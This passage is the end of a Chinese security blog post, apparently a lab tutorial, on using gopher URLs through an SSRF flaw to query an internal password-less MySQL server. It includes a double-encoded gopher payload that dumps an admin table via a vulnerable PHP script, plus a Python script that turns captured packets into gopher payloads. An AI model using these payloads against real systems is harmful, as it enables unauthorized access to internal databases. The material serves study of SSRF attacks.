class="comment">//127.0.0.1:3306/_%bf%00%00%01%84%a6%9f%20%00%00%00%01%2d%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%07%00%00%00%67%75%72%65%6e%6d%65%6e%67%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%7d%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%0a%6c%69%62%6d%61%72%69%61%64%62%04%5f%70%69%64%04%37%31%37%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%05%33%2e%30%2e%39%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%0c%5f%73%65%72%76%65%72%5f%68%6f%73%74%09%31%32%37%2e%30%2e%30%2e%31%21%00%00%00%03%73%65%6c%65%63%74%20%40%40%76%65%72%73%69%6f%6e%5f%63%6f%6d%6d%65%6e%74%20%6c%69%6d%69%74%20%31%12%00%00%00%03%53%45%4c%45%43%54%20%44%41%54%41%42%41%53%45%28%29%0a%00%00%00%02%67%75%72%65%6e%6d%65%6e%67%0f%00%00%00%03%73%68%6f%77%20%64%61%74%61%62%61%73%65%73%0c%00%00%00%03%73%68%6f%77%20%74%61%62%6c%65%73%0b%00%00%00%04%67%72%6d%5f%61%64%6d%69%6e%00%18%00%00%00%03%73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20%67%72%6d%5f%61%64%6d%69%6e%01%00%00%00%01 --output -</span></span><br></pre></td></tr></table></figure></p>
<p><img src="https://k-ring.github.io/img/go9.jpg" alt>  </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//这里进行了两次url编码，应该是php自解码了一次，如果只编码一次，解码之后存在空格，执行system("curl $_GET[url]")时会报错</span></span><br><span class="line">http:<span class="comment">//192.168.159.131/ssrf.php?url=gopher://127.0.0.1:3306/_%25bf%2500%2500%2501%2584%25a6%259f%2520%2500%2500%2500%2501%252d%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2507%2500%2500%2500%2567%2575%2572%2565%256e%256d%2565%256e%2567%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%257d%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%250a%256c%2569%2562%256d%2561%2572%2569%2561%2564%2562%2504%255f%2570%2569%2564%2504%2537%2531%2537%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2505%2533%252e%2530%252e%2539%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%250c%255f%2573%2565%2572%2576%2565%2572%255f%2568%256f%2573%2574%2509%2531%2532%2537%252e%2530%252e%2530%252e%2531%2521%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2540%2540%2576%2565%2572%2573%2569%256f%256e%255f%2563%256f%256d%256d%2565%256e%2574%2520%256c%2569%256d%2569%2574%2520%2531%2512%2500%2500%2500%2503%2553%2545%254c%2545%2543%2554%2520%2544%2541%2554%2541%2542%2541%2553%2545%2528%2529%250a%2500%2500%2500%2502%2567%2575%2572%2565%256e%256d%2565%256e%2567%250f%2500%2500%2500%2503%2573%2568%256f%2577%2520%2564%2561%2574%2561%2562%2561%2573%2565%2573%250c%2500%2500%2500%2503%2573%2568%256f%2577%2520%2574%2561%2562%256c%2565%2573%250b%2500%2500%2500%2504%2567%2572%256d%255f%2561%2564%256d%2569%256e%2500%2518%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%252a%2520%2566%2572%256f%256d%2520%2567%2572%256d%255f%2561%2564%256d%2569%256e%2501%2500%2500%2500%2501</span></span><br></pre></td></tr></table></figure>
<p><img src="https://k-ring.github.io/img/go10.jpg" alt>  </p>
<p>gopher编码脚本(主要是为了编码不可见字符和)：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python</span></span><br><span class="line"><span class="comment"># -*- coding:utf8 -*-</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> getopt</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">togopher</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        opts,args = getopt.getopt(sys.argv[<span class="number">1</span>:], <span class="string">"hf:s:"</span>, [<span class="string">"help"</span>, <span class="string">"file="</span>, <span class="string">"stream="</span>])</span><br><span class="line">    <span class="keyword">except</span>:</span><br><span class="line">        <span class="keyword">print</span> <span class="string">"""</span></span><br><span class="line"><span class="string">        Usage: python togopher.py -f &lt;filename&gt;</span></span><br><span class="line"><span class="string">               python togopher.py -s &lt;Byte stream&gt;</span></span><br><span class="line"><span class="string">               python togopher.py -h</span></span><br><span class="line"><span class="string">        """</span></span><br><span class="line">        sys.exit()</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">if</span> len(opts) == <span class="number">0</span>:</span><br><span class="line">        <span class="keyword">print</span> <span class="string">"Usage: python togopher.py -h"</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> opt,value <span class="keyword">in</span> opts:</span><br><span class="line">        <span class="keyword">if</span> opt <span class="keyword">in</span> (<span class="string">"-h"</span>, <span class="string">"--help"</span>):</span><br><span class="line">            <span class="keyword">print</span> <span class="string">"""</span></span><br><span class="line"><span class="string">            Usage: </span></span><br><span class="line"><span class="string">            -h     --help     帮助</span></span><br><span class="line"><span class="string">            -f     --file     数据包文件名</span></span><br><span class="line"><span class="string">            -s     --stream   从流量包中得到的字节流</span></span><br><span class="line"><span class="string">            """</span></span><br><span class="line">            sys.exit()</span><br><span class="line">        <span class="keyword">if</span> opt <span class="keyword">in</span> (<span class="string">"-f"</span>, <span class="string">"--file"</span>):</span><br><span class="line">            <span class="keyword">if</span> <span class="keyword">not</span> value:</span><br><span class="line">                <span class="keyword">print</span> <span class="string">"Usage: python togopher.py -f &lt;filename&gt;"</span></span><br><span class="line">                sys.exit()</span><br><span class="line">            words = <span class="string">""</span></span><br><span class="line">            <span class="keyword">with</span> open(value, <span class="string">"r"</span>) <span class="keyword">as</span> f:</span><br><span class="line">                <span class="keyword">for</span> i <span class="keyword">in</span> f.readlines():</span><br><span class="line">                    <span class="keyword">for</span> j <span class="keyword">in</span> i:</span><br><span class="line">                        <span class="keyword">if</span> re.findall(<span class="string">r'\n'</span>, j):</span><br><span class="line">                            words += <span class="string">"%0d%0a"</span></span><br><span class="line">                        <span class="keyword">else</span>:</span><br><span class="line">                            temp = str(hex(ord(j)))</span><br><span class="line">                            <span class="keyword">if</span> len(temp) == <span class="number">3</span>:</span><br><span class="line">                                words += <span class="string">"%0"</span> + temp[<span class="number">2</span>]</span><br><span class="line">                            <span class="keyword">else</span>:</span><br><span class="line">                                words += <span class="string">"%"</span> + temp[<span class="number">2</span>:]</span><br><span class="line">            <span class="keyword">print</span> words</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> opt <span class="keyword">in</span> (<span class="string">"-s"</span>, <span class="string">"--stream"</span>):</span><br><span class="line">            <span class="keyword">if</span> <span class="keyword">not</span> value:</span><br><span class="line">                <span class="keyword">print</span> <span class="string">"Usage: python togopher.py -s &lt;Bytg stream&gt;"</span></span><br><span class="line">                sys.exit()</span><br><span class="line">            a = [value[i:i+<span class="number">2</span>] <span class="keyword">for</span> i <span class="keyword">in</span> xrange(<span class="number">0</span>, len(value), <span class="number">2</span>)]</span><br><span class="line">            words = <span class="string">"%"</span> + <span class="string">"%"</span>.join(a)</span><br><span class="line">            <span class="keyword">print</span> words</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line">    togopher()</span><br></pre></td></tr></table></figure></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/SSRF/" rel="tag"># SSRF</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/05/30/PHP伪协议用法的简单记录/" rel="next" title="PHP伪协议用法的简单记录">
                <i class="fa fa-chevron-left"></i> PHP伪协议用法的简单记录
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/06/06/python学习的简单笔记/" rel="prev" title="python学习的简单笔记">
                python学习的简单笔记 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">故人梦</p>
              <p class="site-description motion-element" itemprop="description">人的一生应该这样度过:不因虚度年华而悔恨，也不因碌碌无为而羞愧</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">21</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">8</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">18</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#gopher协议"><span class="nav-number">2.</span> <span class="nav-text">gopher协议</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#在实例中认识与实践gopher"><span class="nav-number">3.</span> <span class="nav-text">在实例中认识与实践gopher</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#对于内网web的GET请求-通常构造gopher用来请求内网"><span class="nav-number">3.1.</span> <span class="nav-text">对于内网web的GET请求(通常构造gopher用来请求内网)</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#攻击内网无密码验证的MySQL服务"><span class="nav-number">3.2.</span> <span class="nav-text">攻击内网无密码验证的MySQL服务</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-snowflake-o"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">故人梦</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">35.3k</span>
  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
